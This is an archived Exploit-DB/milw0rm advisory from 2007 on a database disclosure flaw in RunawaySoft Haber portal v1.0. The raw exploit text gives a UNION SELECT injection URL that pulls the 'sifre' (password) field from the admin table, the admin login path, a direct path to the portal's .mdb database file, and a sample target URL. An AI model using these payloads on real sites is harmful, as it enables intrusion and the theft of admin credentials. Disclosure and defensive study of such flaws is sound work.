RunawaySoft Haber portal v1.0 (tr) Database Disclosure

vendor:

Haber portal

by:

kerem125 & gsy

N/A

CVSS

MEDIUM

Database Disclosure

200

CWE

Product Name: Haber portal

Affected Version From: RunawaySoft Haber portal v1.0 (tr)

Affected Version To: RunawaySoft Haber portal v1.0 (tr)

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

RunawaySoft Haber portal v1.0 (tr) Database Disclosure

The vulnerability allows an attacker to disclose the database of the RunawaySoft Haber portal v1.0 (tr) by accessing the /devami.asp?id=14 endpoint and injecting a UNION SELECT statement. The exposed data includes the 'sifre' field from the 'admin' table. An example exploit URL is provided.

Mitigation:

The vendor should release a patch that fixes the SQL injection vulnerability by properly sanitizing user input. Additionally, access to sensitive database files should be restricted to authorized users only.

Source

Exploit-DB raw data:

############################################################################################################
#Discovered by: kerem125 & gsy
#Website: http://www.kerem125.com/
#Script download: http://www.aspindir.com/goster/4901
#Exploit: /devami.asp?id=14 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#Admin Login : haber/admin/kontrol.asp
#Example: http://www.runaway.somee.com/rshaber/haber/devami.asp?id=1 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#
Contact : kerem125@kerem125.com & by_gsy@hotmail.com

#Special Thanks to : by_emR3 - Bolivar - VolTiGoRe - CyberGhost - KinSize - xYz - F-10
############################################################################################################

RunawaySoft Haber portal v1.0 (tr) Database Disclosure
Example: [site.com]/[path]/haber/data/xice.mdb

# milw0rm.com [2007-05-16]